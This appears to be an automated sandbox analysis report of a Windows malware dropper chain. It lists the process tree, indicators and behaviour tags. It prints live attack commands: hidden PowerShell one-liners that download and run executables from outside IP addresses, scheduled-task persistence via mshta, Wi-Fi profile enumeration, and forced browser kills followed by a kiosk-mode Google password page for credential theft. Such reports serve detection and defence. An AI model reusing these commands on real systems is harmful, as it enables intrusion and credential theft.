pid Process 4712 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 4712 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 4712 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 4936 0c6733a3b9.exe 4936 0c6733a3b9.exe 4936 0c6733a3b9.exe 3464 68a19ce725.exe 3464 68a19ce725.exe 3464 68a19ce725.exe 3464 68a19ce725.exe 3464 68a19ce725.exe 3464 68a19ce725.exe 3464 68a19ce725.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 3464 68a19ce725.exe 3464 68a19ce725.exe 3464 68a19ce725.exe 3464 68a19ce725.exe -
Suspicious use of SendNotifyMessage 37 IoCs
pid Process 4712 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 4712 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 4712 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 4936 0c6733a3b9.exe 4936 0c6733a3b9.exe 4936 0c6733a3b9.exe 3464 68a19ce725.exe 3464 68a19ce725.exe 3464 68a19ce725.exe 3464 68a19ce725.exe 3464 68a19ce725.exe 3464 68a19ce725.exe 3464 68a19ce725.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 516 firefox.exe 3464 68a19ce725.exe 3464 68a19ce725.exe 3464 68a19ce725.exe 3464 68a19ce725.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 516 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4712 wrote to memory of 764 4712 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 84 PID 4712 wrote to memory of 764 4712 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 84 PID 4712 wrote to memory of 764 4712 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 84 PID 4712 wrote to memory of 1756 4712 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 85 PID 4712 wrote to memory of 1756 4712 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 85 PID 4712 wrote to memory of 1756 4712 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 85 PID 764 wrote to memory of 1728 764 cmd.exe 87 PID 764 wrote to memory of 1728 764 cmd.exe 87 PID 764 wrote to memory of 1728 764 cmd.exe 87 PID 1756 wrote to memory of 2896 1756 mshta.exe 89 PID 1756 wrote to memory of 2896 1756 mshta.exe 89 PID 1756 wrote to memory of 2896 1756 mshta.exe 89 PID 2896 wrote to memory of 2932 2896 powershell.exe 100 PID 2896 wrote to memory of 2932 2896 powershell.exe 100 PID 2896 wrote to memory of 2932 2896 powershell.exe 100 PID 2932 wrote to memory of 796 2932 TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE 101 PID 2932 wrote to memory of 796 2932 TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE 101 PID 2932 wrote to memory of 796 2932 TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE 101 PID 796 wrote to memory of 4028 796 rapes.exe 103 PID 796 wrote to memory of 4028 796 rapes.exe 103 PID 796 wrote to memory of 4028 796 rapes.exe 103 PID 4028 wrote to memory of 4008 4028 BUZd3Mq.exe 104 PID 4028 wrote to memory of 4008 4028 BUZd3Mq.exe 104 PID 4028 wrote to memory of 4008 4028 BUZd3Mq.exe 104 PID 4028 wrote to memory of 2848 4028 BUZd3Mq.exe 105 PID 4028 wrote to memory of 2848 4028 BUZd3Mq.exe 105 PID 4028 wrote to memory of 2848 4028 BUZd3Mq.exe 105 PID 2848 wrote to memory of 3152 2848 Build.exe 106 PID 2848 wrote to memory of 3152 2848 Build.exe 106 PID 2848 wrote to memory of 3152 2848 Build.exe 106 PID 3152 wrote to memory of 3040 3152 cmd.exe 108 PID 3152 wrote to memory of 3040 3152 cmd.exe 108 PID 3152 wrote to memory of 3040 3152 cmd.exe 108 PID 3152 wrote to memory of 2804 3152 cmd.exe 109 PID 3152 wrote to memory of 2804 3152 cmd.exe 109 PID 3152 wrote to memory of 2804 3152 cmd.exe 109 PID 3152 wrote to memory of 1564 3152 cmd.exe 110 PID 3152 wrote to memory of 1564 3152 cmd.exe 110 PID 3152 wrote to memory of 1564 3152 cmd.exe 110 PID 2848 wrote to memory of 4408 2848 Build.exe 115 PID 2848 wrote to memory of 4408 2848 Build.exe 115 PID 2848 wrote to memory of 4408 2848 Build.exe 115 PID 4408 wrote to memory of 1728 4408 cmd.exe 117 PID 4408 wrote to memory of 1728 4408 cmd.exe 117 PID 4408 wrote to memory of 1728 4408 cmd.exe 117 PID 4408 wrote to memory of 1548 4408 cmd.exe 118 PID 4408 wrote to memory of 1548 4408 cmd.exe 118 PID 4408 wrote to memory of 1548 4408 cmd.exe 118 PID 796 wrote to memory of 4936 796 rapes.exe 122 PID 796 wrote to memory of 4936 796 rapes.exe 122 PID 796 wrote to memory of 4936 796 rapes.exe 122 PID 4936 wrote to memory of 2796 4936 0c6733a3b9.exe 123 PID 4936 wrote to memory of 2796 4936 0c6733a3b9.exe 123 PID 4936 wrote to memory of 2796 4936 0c6733a3b9.exe 123 PID 4936 wrote to memory of 684 4936 0c6733a3b9.exe 124 PID 4936 wrote to memory of 684 4936 0c6733a3b9.exe 124 PID 4936 wrote to memory of 684 4936 0c6733a3b9.exe 124 PID 2796 wrote to memory of 3272 2796 cmd.exe 126 PID 2796 wrote to memory of 3272 2796 cmd.exe 126 PID 2796 wrote to memory of 3272 2796 cmd.exe 126 PID 684 wrote to memory of 4960 684 mshta.exe 127 PID 684 wrote to memory of 4960 684 mshta.exe 127 PID 684 wrote to memory of 4960 684 mshta.exe 127 PID 796 wrote to memory of 1492 796 rapes.exe 129 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Build.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Build.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe"C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn OdMxkmaweBS /tr "mshta C:\Users\Admin\AppData\Local\Temp\zbIoMqsNd.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn OdMxkmaweBS /tr "mshta C:\Users\Admin\AppData\Local\Temp\zbIoMqsNd.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1728
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\zbIoMqsNd.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE"C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:796 -
C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe"C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Lappy.A.vbs"7⤵
- System Location Discovery: System Language Discovery
PID:4008
-
-
C:\Users\Admin\AppData\Local\Temp\Build.exe"C:\Users\Admin\AppData\Local\Temp\Build.exe"7⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:2848 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All8⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\SysWOW64\chcp.comchcp 650019⤵
- System Location Discovery: System Language Discovery
PID:3040
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile9⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2804
-
-
C:\Windows\SysWOW64\findstr.exefindstr All9⤵
- System Location Discovery: System Language Discovery
PID:1564
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2848 -s 24368⤵
- Program crash
PID:2304
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Windows\SysWOW64\chcp.comchcp 650019⤵
- System Location Discovery: System Language Discovery
PID:1728
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid9⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1548
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe"C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn OXTLVmaes7i /tr "mshta C:\Users\Admin\AppData\Local\Temp\eZLOEW1ax.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn OXTLVmaes7i /tr "mshta C:\Users\Admin\AppData\Local\Temp\eZLOEW1ax.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3272
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\eZLOEW1ax.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:684 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'L15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4960 -
C:\Users\Admin\AppData\Local\TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE"C:\Users\Admin\AppData\Local\TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1116
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
PID:1492 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:4072 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4408
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:1416 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4492
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:4084 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1880
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "nVw3zmaCugA" /tr "mshta \"C:\Temp\C5jLSyw6s.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3152
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\C5jLSyw6s.hta"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2760 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1180 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4148
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe"C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
-
C:\Users\Admin\AppData\Local\Temp\10108710101\561b99cbf5.exe"C:\Users\Admin\AppData\Local\Temp\10108710101\561b99cbf5.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4904 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4168
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe"C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:636 -
C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe"C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1716
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 636 -s 8127⤵
- Program crash
PID:2488
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108730101\49309c0b92.exe"C:\Users\Admin\AppData\Local\Temp\10108730101\49309c0b92.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:684 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:2392
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108740101\1f3ecc566c.exe"C:\Users\Admin\AppData\Local\Temp\10108740101\1f3ecc566c.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5008
-
-
C:\Users\Admin\AppData\Local\Temp\10108750101\a53c2ef5e2.exe"C:\Users\Admin\AppData\Local\Temp\10108750101\a53c2ef5e2.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4288 -
C:\Users\Admin\AppData\Local\Temp\88J2R05CLKFFTOLX.exe"C:\Users\Admin\AppData\Local\Temp\88J2R05CLKFFTOLX.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1536
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108760101\3a82a50014.exe"C:\Users\Admin\AppData\Local\Temp\10108760101\3a82a50014.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1120
-
-
C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe"C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3464 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4156
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4408
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4824
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3832
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4072
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:4844
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:516 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1928 -prefMapHandle 1920 -prefsLen 27368 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1ce29bd-a2c1-456e-834c-16e7269aea66} 516 "\\.\pipe\gecko-crash-server-pipe.516" gpu9⤵PID:2132
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2436 -parentBuildID 20240401114208 -prefsHandle 2428 -prefMapHandle 2416 -prefsLen 28288 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29b4fb96-3fad-4f8d-825b-c9ea27b67642} 516 "\\.\pipe\gecko-crash-server-pipe.516" socket9⤵PID:1356
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3224 -childID 1 -isForBrowser -prefsHandle 3240 -prefMapHandle 3236 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48d81acd-b0ac-488c-9bd1-6850e7e56064} 516 "\\.\pipe\gecko-crash-server-pipe.516" tab9⤵PID:2804
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3980 -childID 2 -isForBrowser -prefsHandle 3996 -prefMapHandle 2688 -prefsLen 32778 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b0a590be-7e65-47bb-9696-7822e28e5ab3} 516 "\\.\pipe\gecko-crash-server-pipe.516" tab9⤵PID:1256
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4896 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4900 -prefMapHandle 4816 -prefsLen 32778 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a9282c8f-b678-4fb1-aa67-3efc0a53833e} 516 "\\.\pipe\gecko-crash-server-pipe.516" utility9⤵
- Checks processor information in registry
PID:5152
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5232 -childID 3 -isForBrowser -prefsHandle 5224 -prefMapHandle 4112 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f096e554-6c1f-47a8-98ef-03b0431cc8eb} 516 "\\.\pipe\gecko-crash-server-pipe.516" tab9⤵PID:5532
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5356 -childID 4 -isForBrowser -prefsHandle 5364 -prefMapHandle 5368 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f5fe5da7-af72-4a22-af82-e6dd375f31b9} 516 "\\.\pipe\gecko-crash-server-pipe.516" tab9⤵PID:5548
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5588 -childID 5 -isForBrowser -prefsHandle 5664 -prefMapHandle 5660 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {01a0b816-5676-4415-a553-ece2a9d8eabd} 516 "\\.\pipe\gecko-crash-server-pipe.516" tab9⤵PID:5564
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe"C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5848
-
-
C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe"C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe"6⤵
- Executes dropped EXE
PID:1424
-
-
C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe"C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5288 -
